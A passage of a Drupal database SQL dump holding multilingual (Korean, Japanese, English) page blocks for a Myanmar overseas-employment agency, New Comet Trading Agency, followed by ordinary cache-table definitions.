('basic', 0, 1, 1, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/new_comet_trading_agency.jpg\" data-align=\"left\" data-entity-uuid=\"2db86a59-6abc-480d-8723-840a63e08233\" data-entity-type=\"file\"></p><div class=\"flex flex-grow flex-col gap-3\"><div class=\"min-h-[20px] flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><h3>\"NEW COMET TRADING AGENCY\" 웹사이트에 오신 것을 환영합니다!!!!&nbsp;</h3><p>\"NEW COMET TRADING AGENCY\" 웹사이트 방문에 감사드립니다! 저희가 여러분을 여기에 맞이할 수 있어 기쁩니다. 자유롭게 웹사이트를 탐색하시고 제공하는 서비스와 기회에 대해 더 자세히 알아보세요. 질문이나 도움이 필요하신 경우 언제든지 저희에게 연락해주십시오. 여러분의 목표 달성을 위한 여정에서 도움을 드리기 위해 준비되어 있습니다.</p><p>저희 해외 취업 대행사는 현재 한국, 일본, 말레이시아 등에서 다양한 채용 정보를 소개하고 있습니다.</p><p>함께 참여해 보세요 !!!</p></div></div></div><div><a href=\"/node/1\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 2, 2, 'en', 0, '<p><a class=\"keep\" href=\"/announcement\">More announcement<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 2, 2, 'ja', 0, '<p><a class=\"keep\" href=\"/announcement\">さらにお知らせ<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 2, 2, 'ko', 0, '<p><a class=\"keep\" href=\"/announcement\">추가공지<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 3, 3, 'en', 0, '<p><a class=\"keep\" href=\"/activities\">More activity<img src=\"/sites/default/files/inline-images/arrow_icon_1.png\" data-entity-uuid=\"3cbef209-85d4-4dca-8253-4b5f9cd30235\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 3, 3, 'ja', 0, '<p><a class=\"keep\" href=\"/activities\">さらなる活動<img src=\"/sites/default/files/inline-images/arrow_icon_1.png\" data-entity-uuid=\"3cbef209-85d4-4dca-8253-4b5f9cd30235\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 3, 3, 'ko', 0, '<p><a class=\"keep\" href=\"/activities\">추가활<img src=\"/sites/default/files/inline-images/arrow_icon_1.png\" data-entity-uuid=\"3cbef209-85d4-4dca-8253-4b5f9cd30235\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 4, 4, 'en', 0, '<p>Building(A-3-2)2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;&nbsp;</p><p>Phone: 01 8393300, 01 8393344, 01 8393393, 09775556677 &nbsp;|&nbsp;</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a> |&nbsp;</p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('basic', 0, 4, 4, 'ja', 0, '<p>Building(A-3-2)2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;&nbsp;</p><p>Phone: 01 8393300, 01 8393344, 01 8393393, 09775556677 |&nbsp;</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a> &nbsp;|&nbsp;</p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('basic', 0, 4, 4, 'ko', 0, '<p>Building(A-3-2)2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;&nbsp;</p><p>Phone: 01 8393300, 01 8393344, 01 8393393, 09775556677 |&nbsp;</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a> |&nbsp;</p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('basic', 0, 5, 5, 'en', 0, '<p>Follow Up On Our Facebook <a href=\"https://www.facebook.com/profile.php?id=100092647360208\" target=\"_blank\"><img src=\"/sites/default/files/inline-images/icon_fb.png\" data-align=\"left\" data-entity-uuid=\"ba1d9141-49be-49d2-93b6-f9881ad95655\" data-entity-type=\"file\"></a></p>', '', 'full_html'),
('basic', 0, 5, 5, 'ja', 0, '<p>Follow Up On Our Facebook <a href=\"https://www.facebook.com/profile.php?id=100092647360208\" target=\"_blank\"><img src=\"/sites/default/files/inline-images/icon_fb.png\" data-align=\"left\" data-entity-uuid=\"ba1d9141-49be-49d2-93b6-f9881ad95655\" data-entity-type=\"file\"></a></p>', '', 'full_html'),
('basic', 0, 5, 5, 'ko', 0, '<p>Follow Up On Our Facebook <a href=\"https://www.facebook.com/profile.php?id=100092647360208\" target=\"_blank\"><img src=\"/sites/default/files/inline-images/icon_fb.png\" data-align=\"left\" data-entity-uuid=\"ba1d9141-49be-49d2-93b6-f9881ad95655\" data-entity-type=\"file\"></a></p>', '', 'full_html'),
('basic', 0, 6, 6, 'en', 0, '<p>Copyright 2023, New Comet Trading Agency Co., Ltd.</p>', '', 'full_html'),
('basic', 0, 7, 7, 'en', 0, '<h2 class=\"text-align-center\">Announcement</h2>', '', 'full_html'),
('basic', 0, 7, 7, 'ja', 0, '<h2 class=\"text-align-center\">お知らせ</h2>', '', 'full_html'),
('basic', 0, 7, 7, 'ko', 0, '<h2 class=\"text-align-center\">공지</h2>', '', 'full_html'),
('basic', 0, 8, 8, 'en', 0, '<h2 class=\"text-align-center\">About Us</h2>', '', 'full_html'),
('basic', 0, 8, 8, 'ja', 0, '<h2 class=\"text-align-center\">会社概要</h2>', '', 'full_html'),
('basic', 0, 8, 8, 'ko', 0, '<h2 class=\"text-align-center\">소개</h2>', '', 'full_html'),
('basic', 0, 9, 9, 'en', 0, '<h2 class=\"text-align-center\">Contact Us</h2>', '', 'full_html'),
('basic', 0, 9, 9, 'ja', 0, '<h2 class=\"text-align-center\">お問い合わせ</h2>', '', 'full_html'),
('basic', 0, 9, 9, 'ko', 0, '<h2 class=\"text-align-center\">연락처</h2>', '', 'full_html'),
('basic', 0, 10, 10, 'en', 0, '<h2 class=\"text-align-center\">Activities</h2>', '', 'full_html'),
('basic', 0, 10, 10, 'ja', 0, '<h2 class=\"text-align-center\">活動</h2>', '', 'full_html'),
('basic', 0, 10, 10, 'ko', 0, '<h2 class=\"text-align-center\">활동</h2>', '', 'full_html'),
('basic', 0, 11, 11, 'en', 0, '<h2 class=\"text-align-center\">Company Profile</h2>', '', 'full_html'),
('basic', 0, 11, 11, 'ja', 0, '<h2 class=\"text-align-center\">会社情報</h2>', '', 'full_html'),
('basic', 0, 11, 11, 'ko', 0, '<h2 class=\"text-align-center\">회사 설립</h2>', '', 'full_html'),
('basic', 0, 12, 12, 'en', 0, '<h2 class=\"text-align-center\">Our Services</h2>', '', 'full_html'),
('basic', 0, 12, 12, 'ja', 0, '<h2 class=\"text-align-center\">事業内容</h2>', '', 'full_html'),
('basic', 0, 12, 12, 'ko', 0, '<h2 class=\"text-align-center\">회사 서비스</h2>', '', 'full_html'),
('basic', 0, 13, 13, 'en', 0, '<h2 class=\"text-align-center\">Mission &amp; Vision</h2>', '', 'full_html'),
('basic', 0, 13, 13, 'ja', 0, '<h2 class=\"text-align-center\">目標 &amp;ミッション</h2>', '', 'full_html'),
('basic', 0, 13, 13, 'ko', 0, '<h2 class=\"text-align-center\">우리의 비젼 &amp; 우리의 미션</h2>', '', 'full_html'),
('basic', 0, 14, 14, 'en', 0, '<h2 class=\"text-align-center\">Future Goal</h2>', '', 'full_html'),
('basic', 0, 14, 14, 'ja', 0, '<h2 class=\"text-align-center\">会社の目標</h2>', '', 'full_html'),
('basic', 0, 14, 14, 'ko', 0, '<h2 class=\"text-align-center\">회사의 미래 비전</h2>', '', 'full_html'),
('basic', 0, 15, 15, 'en', 0, '<h2 class=\"text-align-center\">Company History</h2>', '', 'full_html'),
('basic', 0, 15, 15, 'ja', 0, '<h2 class=\"text-align-center\">会社沿革</h2>', '', 'full_html'),
('basic', 0, 15, 15, 'ko', 0, '<h2 class=\"text-align-center\">Company History</h2>', '', 'full_html'),
('basic', 0, 16, 16, 'en', 0, '<img src=\"/sites/default/files/inline-images/company_profile.png\" data-align=\"center\" data-entity-uuid=\"4a7f3b73-a856-4ca8-a3f9-f757d636fa88\" data-entity-type=\"file\"><p class=\"text-align-justify\">In addition, we are connecting job opportunities for young people who want to work in countries ...</p><div><a class=\"keep\" href=\"/node/23\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 16, 16, 'ja', 0, '<img src=\"/sites/default/files/inline-images/company_profile.png\" data-align=\"center\" data-entity-uuid=\"4a7f3b73-a856-4ca8-a3f9-f757d636fa88\" data-entity-type=\"file\"><p class=\"text-align-justify\"><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">当社は</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">2004</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">年に設立し、登録</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">ID(295/2004</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">ー</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">2005)</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">を持ち、サービスの提供を行ってきました.....</span></p><div><a class=\"keep\" href=\"/ja/node/23\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 16, 16, 'ko', 0, '<img src=\"/sites/default/files/inline-images/company_profile.png\" data-align=\"center\" data-entity-uuid=\"4a7f3b73-a856-4ca8-a3f9-f757d636fa88\" data-entity-type=\"file\"><p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을...</p><div><a class=\"keep\" href=\"/ko/node/23\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 17, 17, 'en', 0, '<img src=\"/sites/default/files/inline-images/our_services.png\" data-align=\"center\" data-entity-uuid=\"032ff33b-e5ee-4678-b9cf-394553a3c5ea\" data-entity-type=\"file\"><p class=\"text-align-justify\">Co-opening and teaching Korean, Japanese, and English basic language courses for work so that....</p><div><a class=\"keep\" href=\"/node/24\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 17, 17, 'ja', 0, '<img src=\"/sites/default/files/inline-images/our_services.png\" data-align=\"center\" data-entity-uuid=\"032ff33b-e5ee-4678-b9cf-394553a3c5ea\" data-entity-type=\"file\"><p class=\"text-align-justify\"><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(51, 51, 51);display:inline !important;float:none;font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">E 7-3 Visa</span><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);box-sizing:border-box;color:rgb(51, 51, 51);font-family:Lato-Regular, pyidaungsu;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\" lang=\"JA\" xml:lang=\"JA\">で働きたいミャ ....</span></p><div><a class=\"keep\" href=\"/ja/node/24\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 17, 17, 'ko', 0, '<img src=\"/sites/default/files/inline-images/our_services.png\" data-align=\"center\" data-entity-uuid=\"032ff33b-e5ee-4678-b9cf-394553a3c5ea\" data-entity-type=\"file\"><p class=\"text-align-justify\">한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 ...</p><div><a class=\"keep\" href=\"/ko/node/24\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 18, 18, 'en', 0, '<img src=\"/sites/default/files/inline-images/vission_mission.png\" data-align=\"center\" data-entity-uuid=\"50f34ff2-1c49-4904-8376-7355f0f27182\" data-entity-type=\"file\"><p>The aim is to train the best local human resources and develop overseas employment...</p><div><a class=\"keep\" href=\"/node/25\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 18, 18, 'ja', 0, '<img src=\"/sites/default/files/inline-images/vission_mission.png\" data-align=\"center\" data-entity-uuid=\"50f34ff2-1c49-4904-8376-7355f0f27182\" data-entity-type=\"file\"><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(51, 51, 51);display:inline !important;float:none;font-family:&quot;Malgun Gothic&quot;, sans-serif;font-size:16px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります....</span></p><div><a class=\"keep\" href=\"/ja/node/25\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 18, 18, 'ko', 0, '<img src=\"/sites/default/files/inline-images/vission_mission.png\" data-align=\"center\" data-entity-uuid=\"50f34ff2-1c49-4904-8376-7355f0f27182\" data-entity-type=\"file\"><p>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .다른 대행사에 비하면 ...</p><div><a class=\"keep\" href=\"/ko/node/25\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 19, 19, 'en', 0, '<img src=\"/sites/default/files/inline-images/future_goal.png\" data-align=\"center\" data-entity-uuid=\"6d40ca24-1206-4343-ae98-bd346e011253\" data-entity-type=\"file\"><p>Our company is established with the aim of creating a company that meets the international...</p><div><a class=\"keep\" href=\"/node/26\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 19, 19, 'ja', 0, '<img src=\"/sites/default/files/inline-images/future_goal.png\" data-align=\"center\" data-entity-uuid=\"6d40ca24-1206-4343-ae98-bd346e011253\" data-entity-type=\"file\"><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(51, 51, 51);display:inline !important;float:none;font-family:&quot;Malgun Gothic&quot;, sans-serif;font-size:17px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し...</span></p><div><a class=\"keep\" href=\"/ja/node/26\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 19, 19, 'ko', 0, '<img src=\"/sites/default/files/inline-images/future_goal.png\" data-align=\"center\" data-entity-uuid=\"6d40ca24-1206-4343-ae98-bd346e011253\" data-entity-type=\"file\"><p>우리 회사는 위대한 미얀마의 현재 상황과 필요에 따라 외국에서 일하고 싶은 미래의 청년들에게 훈련과...</p><div><a class=\"keep\" href=\"/ko/node/26\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 20, 20, 'en', 0, '<img src=\"/sites/default/files/inline-images/company_history.png\" data-align=\"center\" data-entity-uuid=\"77c60154-a377-47fb-8ad6-beea4578f984\" data-entity-type=\"file\"><p>Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by ...&nbsp;</p><div><a class=\"keep\" href=\"/node/27\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 20, 20, 'ja', 0, '<img src=\"/sites/default/files/inline-images/company_history.png\" data-align=\"center\" data-entity-uuid=\"77c60154-a377-47fb-8ad6-beea4578f984\" data-entity-type=\"file\"><p>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で ...&nbsp;</p><div><a class=\"keep\" href=\"/ja/node/27\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 20, 20, 'ko', 0, '<img src=\"/sites/default/files/inline-images/company_history.png\" data-align=\"center\" data-entity-uuid=\"77c60154-a377-47fb-8ad6-beea4578f984\" data-entity-type=\"file\"><p>Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) ...&nbsp;</p><div><a class=\"keep\" href=\"/ko/node/27\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 21, 21, 'en', 0, '<img src=\"/sites/default/files/inline-images/contact_us.png\" data-align=\"center\" data-entity-uuid=\"5deff5f7-b997-4b87-a646-facd09b48ba7\" data-entity-type=\"file\"><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan...</p><div><a class=\"keep\" href=\"/node/11\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 21, 21, 'ja', 0, '<img src=\"/sites/default/files/inline-images/contact_us.png\" data-align=\"center\" data-entity-uuid=\"5deff5f7-b997-4b87-a646-facd09b48ba7\" data-entity-type=\"file\"><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaung...</p><div><a class=\"keep\" href=\"/ja/node/11\">もっと読むにはこちら<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 21, 21, 'ko', 0, '<img src=\"/sites/default/files/inline-images/contact_us.png\" data-align=\"center\" data-entity-uuid=\"5deff5f7-b997-4b87-a646-facd09b48ba7\" data-entity-type=\"file\"><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi Housing)...</p><div><a class=\"keep\" href=\"/ko/node/11\">더읽기<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
('basic', 0, 22, 22, 'ja', 0, '<p><a class=\"keep\" href=\"/language-center\">More Language Center<img src=\"/sites/default/files/inline-images/arrow_icon_2.png\" data-entity-uuid=\"109b8a8f-a099-4327-990d-f54fec10fdf3\" data-entity-type=\"file\" float=\"right\"></a></p>', '', 'full_html'),
('basic', 0, 23, 23, 'en', 0, '<h2>Activities</h2>', '', 'basic_html'),
('basic', 0, 24, 24, 'en', 0, '<h2 class=\"text-align-center\">Language Center</h2>', '', 'full_html'),
('basic', 0, 24, 24, 'ja', 0, '<h2 class=\"text-align-center\">語学センター</h2>', '', 'full_html'),
('basic', 0, 24, 24, 'ko', 0, '<h2 class=\"text-align-center\">언어 센터</h2>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `cachetags`
--

CREATE TABLE `cachetags` (
  `tag` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Namespace-prefixed tag string.',
  `invalidations` int NOT NULL DEFAULT '0' COMMENT 'Number incremented when the tag is invalidated.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Cache table for tracking cache tag invalidations.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_access_policy`
--

CREATE TABLE `cache_access_policy` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_bootstrap`
--

CREATE TABLE `cache_bootstrap` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_config`
--

CREATE TABLE `cache_config` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_container`
--

CREATE TABLE `cache_container` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

